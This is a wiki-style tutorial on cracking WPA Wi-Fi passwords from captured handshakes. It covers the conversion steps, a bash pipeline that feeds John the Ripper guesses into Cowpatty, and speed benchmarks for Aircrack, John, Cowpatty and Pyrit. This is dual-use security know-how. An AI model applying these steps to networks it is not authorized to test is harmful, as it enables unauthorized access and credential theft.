With a plethora of tools, files, and data being generated by wireless sniffing, how do you manage all of your files and options?

Extracting Passwords

The workflow for extracting passwords:

Airdump to monitor, Python to extract data, Python to create attack scripts, Python to process cap files

or,

Besside to vacuum handshakes and put them into one cap file, Besside log to tell you what's in there

Part 2: Cracking Passwords

John the Ripper

You can use John the Ripper to crack WPA by itself: John the Ripper/WPA

John the Ripper takes its own password files, so you have to first convert your cap files to hccap files, then hccap files to John the Ripper password files.

Your procedure is as follows:

• Use cap2hccap to convert cap files into hccap files
• Use hccap2john to convert hccap files into John the Ripper password files
• Use Python to assemble John the Ripper password cracking commands
• Use John the Ripper to crack WPA passwords

Aircrack

You can use Aircrack alone as your password cracker, by feeding it a wordlist. Note that this is not a very good way to use Aircrack, as your wordlist must be exhaustive. A better way is to pair it with another program to generate passwords - like John the Ripper.

Aircrack + John the Ripper

You can use Aircrack and John the Ripper in combination to crack passwords. This setup uses John the Ripper to generate passwords from wordlists - but do so in a way that generates many variations per word, using a set of customized rules. This means that if your wordlist has the word "password", Aircrack by itself would only try "password", but with John the Ripper you can try "password1982" or "Password1234" or "password!" or "pASSWORD" or etc........

Your procedure is as follows:

• Use Python to assemble John the Ripper/Aircrack commands
• Use John the Ripper to generate passwords from wordlists using rules (more info at John the Ripper/Password Generation)
• Use Aircrack to crack the passwords using John (more info at Aircrack and John the Ripper)

Cowpatty + John the Ripper

Cowpatty is yet another WPA cracking program. Like Aircrack, it can accept wordlists from stdin, meaning you can hook it up to John the Ripper. This lets you use John the Ripper for generating password guesses, and Cowpatty for testing them.

The call will look something like this:

#!/bin/bash

# bins
JOHNBIN="/root/codes/john/run/john"
COWPATTYBIN="/root/codes/cowpatty/bin/cowpatty"

# john parameters
WORDLIST="/root/codes/wordlists/rockyou.txt"
RULES="KoreLogicRulesAppendYears"

# cowpatty parameters
CAPFILE="/root/dump/me.capfile"
ESSID="MyRouter"

${JOHNBIN} --wordlist=${WORDLIST} --rules=${RULES} --stdout | ${COWPATTYBIN} -f - -r ${CAPFILE} -s ${ESSID}

Of course, you can also use Python to generate these commands programmatically.

The strategy, then, is this:

• Create a list of word files
• Create a list of rules you want to use
• Create a list of cap files
• Create a list of router ESSIDs whose handshakes are contained in those cap files
• Use Python to loop over each of these items and generate a john/cowpatty command

Pyrit

Oh yeah. Did we cover Pyrit yet?

Pyrit is for cracking passwords using the GPU.

Picking Your Cracking Tool

Which tool should you use? Whichever one is fastest, of course.

You might want to test them all out to see how fast they operate.

Benchmarking Aircrack

Aircrack clocks in as the fastest cracking tool, at 1200 keys per second.

See Aircrack/Benchmarking

Benchmarking Cowpatty

Cowpatty cracks at a rate of about 250 keys per second. It's the slowest of the bunch.

See Cowpatty/Benchmarking

Benchmarking John the Ripper

John the Ripper cracks at a rate of about 1,000 keys per second.

See John the Ripper/Benchmarking

Other Tools

Pyrit on a GPU can run about 100x faster, or on the order of 100,000-300,000 keys per second. That's roughly equivalent to cutting a year's worth of work down into a day.

The Outcome

The outcome is: USE AIRCRACK.

The best approach is to use John the Ripper to feed passwords to Aircrack.

The next best alternative is to use John the Ripper alone, although it is slightly slower than Aircrack.

You don't want to use Cowpatty unless you can improve its key testing rate by using rainbow tables and hash lookup functions.

aircrack-ng a suite of tools for wireless cracking. Aircrack  · Category:Aircrack aircrack-ng Many Ways to Crack a Wifi: Cracking Wifi Aircrack Benchmarking: Aircrack/Benchmarking WEP Attacks with Aircrack: Aircrack/WEP Cracking WPA Attacks with Aircrack: Aircrack/WPA Cracking Aircrack Hardware: Aircrack/Packet Injection Testing Harvesting Wireless Network Information airodump-ng Basic Usage of Airodump Category:Security  · Category:Wireless  · Category:Passwords Flags  · Template:AircrackFlag  · e

john the ripper password generator and all-around cracking tool. John the Ripper  · Category:John the Ripper Installing John the Ripper on Kali 2.0: Kali 2.0/John the Ripper Testing John: John the Ripper/Benchmarking Using John on /etc/shadow files: John the Ripper/Shadow File Password generation using rules and modes: John the Ripper/Password Generation Installing some useful password rules: John the Ripper/Rules Using John to feed password guesses to Aircrack: Aircrack and John the Ripper John the Ripper on AWS: Ubuntu/Barebones to JtR Getting Passwords from John: John the Ripper/Password Recovery Category:Kali  · Category:Security  · Category:Passwords Flags  · Template:JohnFlag  · e